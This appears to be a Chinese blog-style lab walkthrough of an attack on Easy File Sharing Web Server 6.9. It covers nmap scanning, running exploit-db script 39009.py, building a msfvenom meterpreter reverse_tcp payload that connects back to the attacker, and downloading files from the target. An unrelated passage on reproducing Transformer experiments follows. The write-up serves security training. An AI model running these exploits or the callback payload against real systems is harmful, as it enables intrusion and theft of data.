网络渗透复现任务

1、靶机(Window)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

打开软件

将80端口的URL改成靶机的IP

再用kali扫描主机端口,指令如下: nmap -sV 目标IP

可以看到,靶机正在运行Easy file sharing Web Server httpd,版本为6.9

接着,输入指令

searchsploit easy file sharing

查找该服务的相关漏洞

再输入指令:python2 /usr/share/exploitdb/exploits/windows/remote/39009.py IP 80

目标靶机服务已经崩溃,并且弹出了一个计算器

2.Metasploity应用

系统:kali-linux    windows 2003

生成被控端

以前旧版本的 Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本的Metasploit中将这两条命令整合成为了msfvenom命令,下面给出了msfvenom的几个常见的使用参数。

-p,--payload<payload>指定要生成的 payload (攻击荷载)。

“f,--format<format>指定输出格式(可以使用--help-formats来获取msf支持的输出格式列表)

-o,--out<path>指定存储 payload的位置

在kali终端输入生成攻击荷载指令(IP对应攻击者IP,lport对应要开的端口):

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=5000 exe -o /root/payload.exe

生成的被控端文件如图

如果我们让这个文件在某一台计算机(靶机)上执行的话,那么这台计算机就会立刻回连到攻击者IP上,但是我们这时还没有一个主控端,所以我们需要启动一个远程控制文件的主控端。这个主控端需要在 Metasploit中启动。

生成主控端:首先启动msfconsole

输入完4个msf6对应指令后,在Windows2003打开payload(被控端),结果如图

输入show_mount可以查看各磁盘情况

输入 download D:\guestbook  下载文件

文件下载成功

  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
复现Transformer网络的实验,你需要进行以下步骤1. 数据准备:选择适合的数据集,并进行预处理,例如分词、标记化等。确保集被划分为训练集、验证和测试集。 2. 构建模型:按照Transformer的架构,构建模型的编码器和解码器部分。编码器和解码器都由多个层堆叠而成,每个层都包含多头自注意力机制和前馈神经网络。 3. 定义损失函数:选择适当的损失函数,例如交叉熵损失函数,在目标序列上计算模型输出与真实标签之间的差异。 4. 训练模型:使用训练数据集,将数据输入模型中,通过反向传播算法来更新模型的参数。可以使用优化器(如Adam)来调整学习率。 5. 模型评估:使用验证数据集评估模型的性能。计算评价指标,如准确率、BLEU分数等,来衡量模型生成序列的质量。 6. 超参数调优:根据实验结果,调整模型的超参数,包括学习率、批次大小、隐藏单元数等,以获得更好的性能。 7. 测试模型:使用测试数据集评估模型的泛化能力。检查模型在新数据上的性能,验证模型是否能正确生成预测序列。 8. 结果分析:分析模型生成序列的质量,并根据需求进行改进和调整。 请注意,以上步骤仅为一般性指导,具体实现可能因应用场景和数据集的不同而有所变化。复现Transformer网络的实验需要一定的编程和机器学习基础知识。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值